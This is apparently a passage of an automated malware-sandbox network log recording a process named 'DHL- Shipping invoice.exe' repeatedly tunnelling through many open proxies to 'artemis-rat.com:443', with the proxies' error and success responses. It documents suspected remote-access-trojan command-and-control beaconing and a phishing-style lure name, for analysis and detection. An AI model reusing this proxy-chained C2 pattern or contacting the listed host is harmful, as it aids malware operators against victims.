                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.769700050 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            981192.168.2.45291543.133.136.20888006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.951433897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.291452885 CET710INHTTP/1.1 403 Forbidden
                            Server: nginx/1.22.1
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 555
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.22.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            982192.168.2.452945103.221.220.22450696484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.969940901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            983192.168.2.45301695.56.254.13931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.970654964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.247010946 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            984192.168.2.45062358.253.210.12288886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.970742941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            985192.168.2.450759173.212.237.43137656484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.971101999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.140408993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.240087986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.343808889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.343703985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:39.344942093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:51.343604088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:15.347496986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:03.421654940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            986192.168.2.452818111.59.4.8890026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.973819017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.529364109 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            987192.168.2.452962219.73.88.167806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.973850012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            988192.168.2.4530975.161.103.113806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.980298042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            989192.168.2.452974102.130.125.86806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.994920969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.483516932 CET536INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 613
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                            Mar 12, 2024 08:37:03.483552933 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                            Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            990192.168.2.452964202.162.219.1010806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.006917000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            991192.168.2.453109200.111.182.64436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.008074045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            992192.168.2.453113200.111.182.64436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.008836985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            993192.168.2.453116200.111.182.64436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.010437012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            994192.168.2.453117200.111.182.64436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.011801004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            995192.168.2.452940103.49.202.252806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.012574911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.384975910 CET343INHTTP/1.1 400 Bad Request
                            Server: nginx/1.14.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 182
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            996192.168.2.452458103.146.137.7310816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.020355940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            997192.168.2.453047147.75.92.244100016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.023463011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.286374092 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            998192.168.2.452922117.160.250.13288996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.029122114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.443624973 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            999192.168.2.450965198.57.195.42316836484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.033200026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.062484026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.063090086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.063112974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.062519073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:39.067675114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:51.249774933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:15.267379999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1000192.168.2.45300461.129.2.21280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.034157991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.378263950 CET726INHTTP/1.1 502 Bad Gateway
                            Server: nginx/1.20.1
                            Date: Tue, 12 Mar 2024 07:34:30 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 559
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1001192.168.2.45309681.19.141.20985066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.042196989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1002192.168.2.45299649.228.131.16950006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.042732954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
